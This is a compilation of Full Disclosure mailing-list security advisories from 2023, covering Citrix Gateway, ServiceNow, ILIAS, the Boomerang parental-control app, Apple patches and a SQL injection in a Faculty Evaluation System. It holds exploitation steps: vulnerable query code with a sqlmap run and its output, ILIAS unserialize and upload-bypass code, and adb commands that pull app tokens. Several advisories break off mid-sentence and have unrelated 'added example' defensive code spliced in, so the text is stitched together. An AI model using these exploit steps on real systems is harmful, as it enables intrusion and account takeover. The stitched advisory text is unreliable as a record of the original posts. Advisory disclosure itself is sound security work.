[FD] [tool] tc - anonymous and cyphered chat over Tor circuits in PGP
Hello,

tc is a low-tech free software to chat anonymously and cyphered over Tor circuits in PGP. Use it to protect your communication end-to-end with RSA/DSA encryption and keep yourself anonymously reachable by anyone who only knows your .onion address and your public key. All this and more in 2400 lines of C code that compile and run on BSD and Linux systems with an IRC-like GUI. It's a minimal, easy to customize unix tool that I wrote to overcome control, voyeurism and censorship, avoiding platforms, logging and data retention.

site: r4f5fajp2oiuhjqyass3nogu55sivxnc42fnwankiynf6o5jpno6exad.onion/tc.html
mirror: https://packetstormsecurity.com/files/172562/tc-Tor-Chat-Client.html

Good night and good luck,
f.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Citrix Gateway & Cloud MFA - Insufficient Session Validation Vulnerability
Document Title:
===============
Citrix Gateway & Cloud MFA - Insufficient Session Validation Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2324

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2023/07/03/citrix-gateway-cloud-mfa-insufficient-session-validation-vulnerability

Security Video: (Cloud) https://www.youtube.com/watch?v=vObgOpGpCSM
Security Video: (OnPrem) https://www.youtube.com/watch?v=RFjRgiW2OWE

Release Date:
=============
2023-07-03

Vulnerability Laboratory ID (VL-ID):
====================================
2324

Common Vulnerability Scoring System:
====================================
5

Vulnerability Class:
====================
Insufficient Session Validation

Current Estimated Price:
========================
2.000€ - 3.000€

Product & Service Introduction:
===============================
Cloud Software Group's NetScaler and NetScaler Gateway, previously better known as Citrix ADC and Citrix Gateway (and hereafter referred to as Citrix *) provides secure and reliable access to web applications, enterprise applications and corporate data.

"Citrix Gateway consolidates remote access infrastructure to provide single sign-on for all apps, whether in a data center, in a cloud, or if the apps are deployed as SaaS apps. It allows users to access any app from any device through a single URL. Citrix Gateway is easy to deploy and easy to manage. The most typical deployment configuration is to place the Citrix Gateway appliance in the DMZ. You can install multiple Citrix Gateway appliances on the network for more complex deployments."

(Copy of the Homepage: https://docs.citrix.com/de-de/citrix-gateway.html )

"Many companies restrict website access to valid users only, and control the level of access permitted to each user. The authentication, authorization, and auditing feature allows a site administrator to manage access controls with the NetScaler appliance instead of managing these controls separately for each application. Doing authentication on the appliance also permits sharing this information across all websites within the same domain that are protected by the appliance."

(Copy of the Homepage: https://docs.netscaler.com/en-us/citrix-adc/current-release/aaa-tm.html & https://citrix.cloud.com & https://cloud.citrix.com)

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a web vulnerability in the official Citrix Gateway (ADC/NetScaler) 13.0 & 13.1 web-application, Cloud and AAA Feature.

Affected Product(s):
====================
Manufacturer: Citrix/Cloud Software Group
Products:
Citrix ADC/NetScaler 13.0 & 13.1
Citrix Gateway/Netscaler Gateway 13.0 & 13.1
Citrix Cloud Services Website
Possibly also earlier versions

Vulnerability Disclosure Timeline:
==================================
2023-03-27: Researcher Notification & Coordination (Security Researcher)
2023-04-24: Vendor Notification (Security Department)
2023-04-26: Vendor Response/Feedback #1 (Security Department)
2023-04-27: Vendor Response/Feedback #2 (Security Department)
2023-05-04: Vendor Response/Feedback #2 (Security Department)
2023-**-**: Security Acknowledgements (Security Department)
2023-**-**: Vendor Fix/Patch by Check (Service Developer Team)
2023-07-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
An insufficient session validation web vulnerability was discovered in the Citrix Gateway (ADC/NetScaler) 13.0 & 13.1 web-application, Cloud and AAA Feature. The security vulnerability allows remote attackers to bypass the MFA function by hijacking the session data of an active user (non-expired session) to follow up with further compromising attacks.

The insufficient session validation vulnerability is located in the Citrix Gateway login without web-application firewall (WAF) and the Citrix Gateway login with web-application firewall (WAF). Attackers can access the applications behind the Citrix Gateway without authentication after compromising a client by extracting a specific generated access cookie. In the on-prem version of Citrix ADC and Citrix Gateway it is only required to hijack the NSC_AAAC cookie for unauthorized access through the Citrix Gateway. To gain access to AAA-protected web services it is required to hijack the NSC_TMAS cookie. The security issue is not only exploitable in the on-prem version of Citrix ADC and Citrix Gateway, but as well in the Citrix Cloud Services Website. For Citrix Cloud S
[FD] SQLi - Faculty Evaluation System
# Exploit Title: Faculty Evaluation System - SQL Injection
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 1.0
# Tested on: Windows Server 2022

SQLi #1

File: edit_evaluation
Line #4

$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
[...]

SQLi #2

File: view_faculty.php
Line #4

// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
[...]

Steps to Exploit:
1. Login to application
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"
3. Copy request to intercept proxy to file
4. Exploit using SQLMap

sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint

[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.6.49
fork fingerprint: MariaDB
[...]
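As an added example (not the advisory's or the Faculty Evaluation System's own code), the `view_faculty.php` query quoted above sits next to a hardened version that validates `id` as a positive integer and binds it as a prepared-statement parameter. `$conn` is assumed to be a mysqli connection, as in the quoted source; `validateId` and the function names are this example's own.

```php
<?php
// Added example, not part of the advisory or the Faculty Evaluation System.
// Assumes $conn is a mysqli connection, as in the quoted view_faculty.php.
declare(strict_types=1);

// Vulnerable pattern quoted in the advisory: the raw id parameter is
// concatenated into the SQL text, so input such as "1 OR 1=1" is parsed
// as SQL rather than treated as a value.
function viewFacultyVulnerable(mysqli $conn, array $get): ?array
{
    $qry = $conn->query(
        "SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = " . $get['id']
    );
    return $qry ? $qry->fetch_array() : null;
}

// Validation step: the only legitimate ids are positive integers. Anything
// else (including "1 OR 1=1" or an empty value) is rejected before it gets
// anywhere near the database.
function validateId(mixed $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened version: validate, then bind the value as an integer parameter.
// The statement text is fixed, so the value can never alter its structure.
function viewFacultySafe(mysqli $conn, array $get): ?array
{
    $id = validateId($get['id'] ?? null);
    if ($id === null) {
        http_response_code(400);
        return null;
    }
    $stmt = $conn->prepare(
        "SELECT *, CONCAT(firstname, ' ', lastname) AS name FROM faculty_list WHERE id = ?"
    );
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Offline check of the validation step with constructed inputs (no database
// needed): legitimate ids pass, injection-shaped or negative values do not.
foreach (['1', '42', '1 OR 1=1', '-5', '', 'abc'] as $input) {
    printf("%-12s -> %s\n", var_export($input, true),
        validateId($input) === null ? 'rejected' : 'accepted');
}
```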
[FD] APPLE-SA-2023-06-21-1 Safari 16.5.1
APPLE-SA-2023-06-21-1 Safari 16.5.1

Safari 16.5.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213816.

Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories.

WebKit
Available for: macOS Monterey
Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 256567
CVE-2023-32439: an anonymous researcher

Safari 16.5.1 may be obtained from the Mac App Store.

All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
[FD] APPLE-SA-2023-06-21-2 iOS 16.5.1 and iPadOS 16.5.1
APPLE-SA-2023-06-21-2 iOS 16.5.1 and iPadOS 16.5.1

iOS 16.5.1 and iPadOS 16.5.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213814.

Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories.

Kernel
Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later
Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Description: An integer overflow was addressed with improved input validation.
CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky

WebKit
Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later
Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 256567
CVE-2023-32439: an anonymous researcher

This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/

iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.

The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.

To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update will be "iOS 16.5.1 and iPadOS 16.5.1".

All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
[FD] APPLE-SA-2023-06-21-3 iOS 15.7.7 and iPadOS 15.7.7
APPLE-SA-2023-06-21-3 iOS 15.7.7 and iPadOS 15.7.7

iOS 15.7.7 and iPadOS 15.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213811.

Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories.

This document describes the security content of iOS 15.7.7 and iPadOS 15.7.7.

Kernel
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)
Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Description: An integer overflow was addressed with improved input validation.
CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky

WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 256567
CVE-2023-32439: an anonymous researcher

WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)
Impact: Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Description: A memory corruption issue was addressed with improved state management.
WebKit Bugzilla: 251890
CVE-2023-32435: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky

All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
[FD] APPLE-SA-2023-06-21-4 macOS Ventura 13.4.1
APPLE-SA-2023-06-21-4 macOS Ventura 13.4.1

macOS Ventura 13.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213813.

Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories.

Kernel
Available for: macOS Ventura
Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Description: An integer overflow was addressed with improved input validation.
CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky

WebKit
Available for: macOS Ventura
Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 256567
CVE-2023-32439: an anonymous researcher

macOS Ventura 13.4.1 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/

All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
[FD] APPLE-SA-2023-06-21-5 macOS Monterey 12.6.7
APPLE-SA-2023-06-21-5 macOS Monterey 12.6.7

macOS Monterey 12.6.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213810.

Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories.

Kernel
Available for: macOS Monterey
Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Description: An integer overflow was addressed with improved input validation.
CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky

macOS Monterey 12.6.7 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/

All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
[FD] APPLE-SA-2023-06-21-6 macOS Big Sur 11.7.8
APPLE-SA-2023-06-21-6 macOS Big Sur 11.7.8

macOS Big Sur 11.7.8 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213809.

Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories.

Kernel
Available for: macOS Big Sur
Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Description: An integer overflow was addressed with improved input validation.
CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky

macOS Big Sur 11.7.8 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/

All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
[FD] APPLE-SA-2023-06-21-7 watchOS 9.5.2
APPLE-SA-2023-06-21-7 watchOS 9.5.2

watchOS 9.5.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213812.

Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories.

Kernel
Available for: Apple Watch Series 4 and later
Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Description: An integer overflow was addressed with improved input validation.
CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky

Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641

To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About".

All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
[FD] APPLE-SA-2023-06-21-8 watchOS 8.8.1
APPLE-SA-2023-06-21-8 watchOS 8.8.1

watchOS 8.8.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213808.

Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories.

Kernel
Available for: Apple Watch Series 3, Series 4, Series 5, Series 6, Series 7, and SE
Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Description: An integer overflow was addressed with improved input validation.
CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky

Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641

To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About".

All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
[FD] ServiceNow Account Takeover to Full Admin Compromise
1. INFORMATION
--------------
[+] CVE: CVE-2022-43684
[+] Title : Insecure Access Control To Full Admin Compromise
[+] Vendor : ServiceNow
[+] Publication date : June 2023
[+] Credits: Luke Symons, Tony Wu, Eldar Marcussen, Gareth Phillips, Jeff Thomas, Nadeem Salim, and Stephen Bradshaw.

2. AFFECTED VERSIONS
--------------------
* Quebec prior to Patch 10 Hot Fix 8b
* Rome prior to Patch 10 Hot Fix 1
* San Diego prior to Patch 7
* Tokyo prior to Tokyo Patch 1; and
* Utah prior to Utah General Availability

3. DETAILS
----------
ServiceNow is a cloud-based platform that provides service management software as a service (SaaS). It is used by millions of companies worldwide, and specializes in IT Service Management (ITSM), IT Operations Management (ITOM), and IT Business Management (ITBM). It allows users to manage incidents, service requests, problems, and changes within the IT infrastructure of a business. It also provides a self-service portal where end users can request IT services and log issues.

During a security audit it was identified that a threat actor could exploit an access control issue and a number of other vulnerabilities and chain them together in a ServiceNow instance, leading to an effective account takeover to obtain administrative access on the platform as a low privileged user.

An XHR request to xmlhttp.do with the "ChartDataProcessor" processor in the POST request allows the enumeration of the ServiceNow GQL database, including read access to the `sys_user_session` and `sys_user_token` tables, which provide the necessary information to generate valid `glide_user_activity` and `glide_session_store` cookies, and the X-Usertoken header to allow privilege escalation to any previously authenticated user.

4. INFORMATION
--------------
A blog writeup detailing the vulnerabilities and issues as well as a proof of concept can be accessed at https://x64.sh/posts/ServiceNow-Insecure-access-control-to-admin/

5. REMEDIATION
--------------
ServiceNow has released patches and an upgrade that address an Access Control List (ACL) bypass issue in ServiceNow Core functionality.
[FD] SEC Consult SA-20230627-0 :: Multiple high risk vulnerabilities in ILIAS eLearning platform
SEC Consult Vulnerability Lab Security Advisory < 20230627-0 > === title: Multiple high risk vulnerabilities product: ILIAS eLearning platform vulnerable version: see section "Vulnerable version" below fixed version: see section "Solution" below CVE number: - impact: High homepage: https://www.ilias.de found: 2022-12-28 by: Armin Stock (Atos) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com === Vendor description: --- "Around since 1998, ILIAS is a powerful learning management system that fulfills all your requirements. Using its integrated tools, small and large businesses, universities, schools and public authorities are able to create tailored, individual learning scenarios." Source: https://www.ilias.de/en/ Business recommendation: The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: --- 1) Authenticated remote code execution (ilObjRoleGUI) The function `changeExistingObjectsObject` of the class `ilObjRoleGUI` passes user-controlled data to the `unserialize` function. --- # FILE: Services/AccessControl/classes/class.ilObjRoleGUI.php /** * Change existing objects * @return */ protected function changeExistingObjectsObject() { global $DIC; $tree = $DIC['tree']; $rbacreview = $DIC['rbacreview']; $rbacadmin = $DIC['rbacadmin']; $mode = (int) $_POST['mode']; $start = ($this->obj_ref_id == ROLE_FOLDER_ID ? ROOT_FOLDER_ID : $this->obj_ref_id); $this->object->changeExistingObjects($start, $mode, unserialize(ilUtil::stripSlashes($_POST['type_filter']))); ilUtil::sendSuccess($this->lng->txt('settings_saved'), true); $this->ctrl->redirect($this, 'perm'); } --- The user-controlled `POST` parameter `type_filter` is passed to the `unserialize` function. 
The function `ilUtil::stripSlashes` only tries to protect against HTML injection and does not interfere with the serialized payload.

To be able to exploit this vulnerability it is required to have `edit_permission` on an object which supports the `ilPermissionGUI` command and has a `ref_id`. Also an `obj_id` of a role is required. As an example the `course` object is used.

---
# FILE: Services/AccessControl/classes/class.ilPermissionGUI.php
public function executeCommand()
{
    global $DIC;

    $rbacsystem = $DIC['rbacsystem'];
    $ilErr = $DIC['ilErr'];

    // only "edit_permission" on the current object is checked before a role obj_id from $_GET is used
    if (!$rbacsystem->checkAccess("edit_permission", $this->gui_obj->object->getRefId())) {
        $ilErr->raiseError($this->lng->txt("permission_denied"), $ilErr->MESSAGE);
    }

    $next_class = $this->ctrl->getNextClass($this);

    switch ($next_class) {
        case "ilobjrolegui":
            $this->ctrl->setReturn($this, 'perm');
            include_once("Services/AccessControl/classes/class.ilObjRoleGUI.php");
            $this->gui_obj = new ilObjRoleGUI("", (int) $_GET["obj_id"], false, false);
            $ret = $this->ctrl->forwardCommand($this->gui_obj);
            break;
---

2) ilUtil::renameExecutables bypass allows PHP code execution
The ILIAS platform uses the function `ilUtil::renameExecutables` in the `ilFileSystemGUI` class (used to upload or unzip files for various objects) to prevent the upload of executable files like `.php`.

# File: ILIAS-7.17\Services\FileSystem\classes\class.ilFileSystemGUI.php
/**
 * delete object file
 */
public function unzipFile($a_file = null)
{
    # ...
    if (@is_file($a_file)) {
        include_once("./Services/Utilities/classes/class.ilFileUtils.php");

        $cur_files = array_keys(ilUtil::getDir($cur_dir));
        $cur_files_r = iterator_to_array(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($cur_dir)));

        if ($this->getAllowDirectories()) {
            ilUtil::unzip($a_file, true);
        } else {
            ilUtil::unzip($a_file, true, true);
        }
        # ...
    }
    # Call to renameExecutables, after a ZIP file has been unzipped i
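The following is an added example in Python (not ILIAS code) of the check a server-side filter or WAF rule could apply to a parameter such as `type_filter` before it ever reaches `unserialize()`: it parses the PHP `serialize()` format and reports which classes the payload would instantiate. It assumes the legitimate value is a flat serialized array of object-type strings; both sample payloads are constructed. The proper fix remains not to pass user input to `unserialize()` at all, or at least to call it with `['allowed_classes' => false]`.

```python
"""Inspect a PHP serialize() string before it reaches unserialize().

Added example, not ILIAS code. Objects (O:/C:) are what make unserialize()
dangerous, so the parser collects every class name a payload would load.
"""
from typing import Any, Dict, List, Tuple


class PhpUnserializeError(ValueError):
    """Malformed or unsupported serialized data."""


def _parse(data: bytes, pos: int, classes: List[str]) -> Tuple[Any, int]:
    """Parse one value at `pos`; return (value, position after it).

    Objects become ("object", class_name, props) and their class names are
    appended to `classes` so the caller can decide whether to reject."""
    tag = data[pos:pos + 1]
    if tag == b"N":                                   # N;
        return None, pos + 2
    if tag in (b"b", b"i", b"d", b"r", b"R"):         # i:42;  b:1;  d:1.5;  r:2;
        end = data.index(b";", pos)
        raw = data[pos + 2:end].decode("ascii")
        if tag == b"b":
            return raw == "1", end + 1
        return (float(raw) if tag == b"d" else int(raw)), end + 1
    if tag in (b"s", b"S"):                           # s:3:"abc";  (length is in bytes)
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip :"
        if data[start + length:start + length + 2] != b'";':
            raise PhpUnserializeError("bad string length at offset %d" % pos)
        return data[start:start + length].decode("utf-8", "replace"), start + length + 2
    if tag == b"a":                                   # a:2:{key;value;key;value;}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        p = colon + 2                                 # skip :{
        arr: Dict[Any, Any] = {}
        for _ in range(count):
            key, p = _parse(data, p, classes)
            if not isinstance(key, (int, str)):
                raise PhpUnserializeError("invalid array key at offset %d" % p)
            arr[key], p = _parse(data, p, classes)
        if data[p:p + 1] != b"}":
            raise PhpUnserializeError("unterminated array at offset %d" % pos)
        return arr, p + 1
    if tag in (b"O", b"C"):                           # O:8:"stdClass":1:{...}  C:4:"Name":5:{blob}
        colon = data.index(b":", pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len].decode("utf-8", "replace")
        classes.append(name)
        p = colon + 2 + name_len + 2                  # skip "Name":
        colon2 = data.index(b":", p)
        count = int(data[p:colon2])
        p = colon2 + 2                                # skip :{
        props: Dict[Any, Any] = {}
        if tag == b"C":                               # opaque payload of `count` bytes
            p += count
        else:
            for _ in range(count):
                key, p = _parse(data, p, classes)
                if not isinstance(key, (int, str)):
                    raise PhpUnserializeError("invalid property key at offset %d" % p)
                props[key], p = _parse(data, p, classes)
        if data[p:p + 1] != b"}":
            raise PhpUnserializeError("unterminated object at offset %d" % pos)
        return ("object", name, props), p + 1
    raise PhpUnserializeError("unknown type tag %r at offset %d" % (tag, pos))


def php_serialized_classes(payload: str) -> List[str]:
    """Class names that unserialize() would instantiate for this payload."""
    classes: List[str] = []
    data = payload.encode("utf-8")
    _, end = _parse(data, 0, classes)
    if end != len(data):
        raise PhpUnserializeError("trailing data after offset %d" % end)
    return classes


def is_safe_type_filter(payload: str) -> bool:
    """Accept only a flat array of strings (the assumed legitimate shape)."""
    classes: List[str] = []
    data = payload.encode("utf-8")
    try:
        value, end = _parse(data, 0, classes)
    except (ValueError, IndexError, TypeError):
        return False
    if end != len(data) or classes:
        return False
    return isinstance(value, dict) and all(isinstance(v, str) for v in value.values())


# Constructed sample inputs (not taken from the advisory):
BENIGN_FILTER = 'a:2:{i:0;s:3:"crs";i:1;s:3:"grp";}'
OBJECT_FILTER = 'a:1:{i:0;O:8:"stdClass":1:{s:3:"foo";s:3:"bar";}}'

if __name__ == "__main__":
    for sample in (BENIGN_FILTER, OBJECT_FILTER):
        print(sample, "->", php_serialized_classes(sample), is_safe_type_filter(sample))
```

The parser works on bytes because PHP string lengths are byte counts; a payload whose declared lengths do not line up is rejected as malformed rather than guessed at, which is the behaviour you want in front of a deserializer.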
[FD] SEC Consult SA-20230628-0 :: Stored XSS & Privilege Escalation in Boomerang Parental Control App
SEC Consult Vulnerability Lab Security Advisory < 20230628-0 >
===
title: Stored XSS & Privilege Escalation
product: Boomerang Parental Control App
vulnerable version: <13.83
fixed version: >=13.83 (only issue 1), rest not fixed
CVE number: CVE-2023-36620, CVE-2023-36621
impact: High
homepage: https://nationaledtech.com
found: 2022-09-29
by: Fabian Densborn (Office Vienna)
    Bernhard Gründling (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Eviden business
    Europe | Asia
    https://www.sec-consult.com
===

Vendor description:
---
"National Education Technologies Inc. is a manufacturer of mobile applications. Their portfolio ranges from parental control apps, to safe browsing apps, to digital wellbeing apps."
Source: https://nationaledtech.com

Business recommendation:
---
The vendor only provides an update for one of the identified security issues, but it effectively reduces the risk of some of the other vulnerabilities, which are currently not fixed yet. The vendor could not provide a timeline for when the rest of the issues will be patched.

If possible, limit the possibility to boot into Android safe mode. Otherwise children are always able to bypass any restrictions.

An in-depth security analysis performed by security professionals is highly advised, to identify and resolve potential further critical security issues.

Vulnerability overview/description:
---
1) ADB Backup allowed (CVE-2023-36620)
The app is missing the android:allowBackup="false" attribute in the manifest, which allows the user to back up the internal memory of the app to a PC (in case ADB is enabled). This gives the user access to the device token and the API token, which are used to authenticate requests to the API.

2) Stored XSS
The customizable name of the child's device can be used to trigger an XSS payload in the parent web dashboard. Children might be able to attack their parents' account.
3) Trigger parent control functions from child device (Privilege Escalation)
A device token in the form of a UUID is used as a session token for the parent and the child device. The parent device token is leaked on an endpoint which is accessible by the child, which is equivalent to leaking the session token. This token can then be used to authenticate requests to the API and obtain the same access rights as the parent. This would allow a child to bypass restrictions and access device settings.

4) Disable Child App Restriction without Parent's notice (CVE-2023-36621)
The child can remove all restrictions temporarily or uninstall the application without the parents noticing.

Proof of concept:
---
1) ADB Backup allowed (CVE-2023-36620)
The internals of the app can be backed up to a PC by connecting the device and running the following commands. As a prerequisite, the ADB feature must be enabled, or ADB must be used via recovery. Children could bypass any Android setting restrictions via vulnerability 3).

adb backup -apk com.nationaledtech.Boomerang
dd if=backup.ab bs=24 skip=1 | zlib-flate -uncompress | tar xf -

The internal data contains the device and API token which are used to communicate with the API.

2) Stored XSS
As the internal memory including the device and API token can be backed up (see 1), it is possible to construct arbitrary requests to the API in the name of the child.
The following payload can be used to change the device name and trigger an alert box in the dashboard of the parent:

POST /services/DeviceService.svc/RenameDevice HTTP/1.1
Accept: application/json
Content-Type: application/json;charset=UTF-8
Content-Length: 1470
Host: app.useboomerang.com

{
  "DeviceToken": ,
  "ApiToken": ,
  "DeviceTitle": "\"\/>",
  "TargetDeviceToken":
}

3) Access parent control functions from child device (Privilege Escalation)
When visiting the Family Messenger tab within the application on the device, a GET request to the API endpoint `/services/FamilyService.svc/GetAllFamilyDevices` is sent, and the response contains all DeviceTokens associated with the account (including the ones of parent devices). To be able to query the `/services/FamilyService.svc/GetAllFamilyDevices` endpoint an attacker first needs to back up their device and get access to their own device
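As an added example (not code from the advisory or the vendor) of what the `dd bs=24 skip=1 | zlib-flate -uncompress | tar xf -` pipeline in the proof of concept above does, the following Python parses the `.ab` header instead of hard-coding the 24-byte offset (which is only right for an unencrypted, compressed version-5 backup), refuses encrypted backups explicitly and lists the files inside. The backup it processes is constructed in memory; the package name, file path and token value are sample data.

```python
"""Parse an Android `adb backup` (.ab) file and list what it contains.

Added example, not advisory or vendor code. Header layout: the magic line
"ANDROID BACKUP\n" followed by three newline-terminated ASCII fields
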